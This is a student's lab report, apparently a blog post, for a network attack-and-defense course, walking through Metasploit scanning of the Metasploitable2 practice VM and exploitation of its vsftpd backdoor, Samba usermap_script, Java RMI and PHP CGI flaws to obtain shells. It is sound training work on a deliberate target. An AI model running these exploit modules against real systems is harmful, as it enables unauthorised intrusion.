20222310 2024-2025-1 《网络与系统攻防技术》实验六实验报告

一、实验内容

学习掌握Metasploit工具的使用。

下载靶机Metasploitable2,完成以下实验内容。

1.前期渗透

(1)主机发现(可用Aux中的arp_sweep,search一下就可以use)

(2)端口扫描(可以直接用nmap,也可以用Aux中的portscan/tcp等)

(3)扫描系统版本,漏洞等

2.Vsftpd源码包后门漏洞(21端口)

3.SambaMS-RPC Shell命令注入漏洞(端口139)

4.Java RMI SERVER命令执行漏洞(1099端口)

5.PHP CGI参数执行注入漏洞(80端口)

二、实验过程

1.前期渗透

(1)主机发现

靶机ifconfig,查看靶机的ip地址,为192.168.196.129

攻击机ping靶机,能ping通

打开msfconsole控制台,search arp_sweep选择漏洞

use 0
set rhost 192.168.196.129
run

扫描靶机,成功找到

(2)端口扫描

打开msfconsole控制台,search portscan/tcp选择漏洞

use 0
set rhost 192.168.196.129
set ports 1-2000
run

(因为tcp扫描速度比较慢,这里只选择扫描1-2000端口,有兴趣的可以扫描1-65535端口)开放的端口如图

(3)扫描目标HTTP服务器的HTTP版本信息

打开msfconsole控制台,use auxiliary/scanner/http/http_version选择漏洞

set rhost 192.168.196.129
run

成功扫描出了HTTP版本信息

2.Vsftpd源码包后门漏洞(21端口)

在之前的端口扫描中,我们知道了21端口是可以被利用的

打开msfconsole控制台,use exploit/unix/ftp/vsftpd_234_backdoor选择漏洞

set rhost 192.168.196.129
run

成功得到了靶机的shell,输入uname -a,pwd,id,ifconfig验证

3.SambaMS-RPC Shell命令注入漏洞(端口139)

在之前的端口扫描中,我们知道了139端口是可以被利用的

打开msfconsole控制台,use exploit/multi/samba/usermap_script选择漏洞

set rhost 192.168.196.129
exploit

成功得到了靶机的shell,输入uname -a,ifconfig验证

4.Java RMI SERVER命令执行漏洞(1099端口)

在之前的端口扫描中,我们知道了1099端口是可以被利用的

打开msfconsole控制台,use exploit/multi/misc/java_rmi_server选择漏洞

set rhost 192.168.196.129
run

进程建立成功,接着输入sessions -i 1,shell,ls验证得到了shell

也可以输入whoami进行验证

5.PHP CGI参数执行注入漏洞(80端口)

在之前的端口扫描中,我们知道了80端口是可以被利用的

打开msfconsole控制台,use exploit/multi/http/php_cgi_arg_injection选择漏洞

set rhost 192.168.196.129
run

获得了靶机的shell,输入shell,ls查看文件

三、问题及解决方案

问题1:virtualbox上安装的kali无法与给定的靶机进行有效互动,有些漏洞利用不了

问题1解决方案:在vmware上重建一个kali虚拟机,并且kali和ubuntu的网络连接方式都设置为NAT模式

四、学习感悟、思考等

经过11月14号的作业和此次实验,我已经对Metasploit工具的使用有所掌握。总的来说就是“进入控制台——选择漏洞——设置参数——运行”。
作业指令和实验指令都比较简单,问题出现较多的地方就是靶机和攻击机的配置设置问题,比如我virtualbox上的kali攻击vmware上的ubuntu时会出现一些问题,并且无论怎么调整网络连接也无法完整完成实验要求。但我在vmware上重建一个kali虚拟机,并且kali和ubuntu的网络连接都改为NAT模式后所有的问题都迎刃而解。
通过此次实验,我最大的感受是计算机漏洞的存在是巨大的隐患,我们日常生活中一定不能随意打开来路不明的网址、文件,要配置好自己主机的安全策略和防护软件,使自己的设备时刻处于保护中,警惕信息泄露。

posted on 2024-11-16 15:18  abe1fan  阅读(21)  评论(0编辑  收藏  举报

导航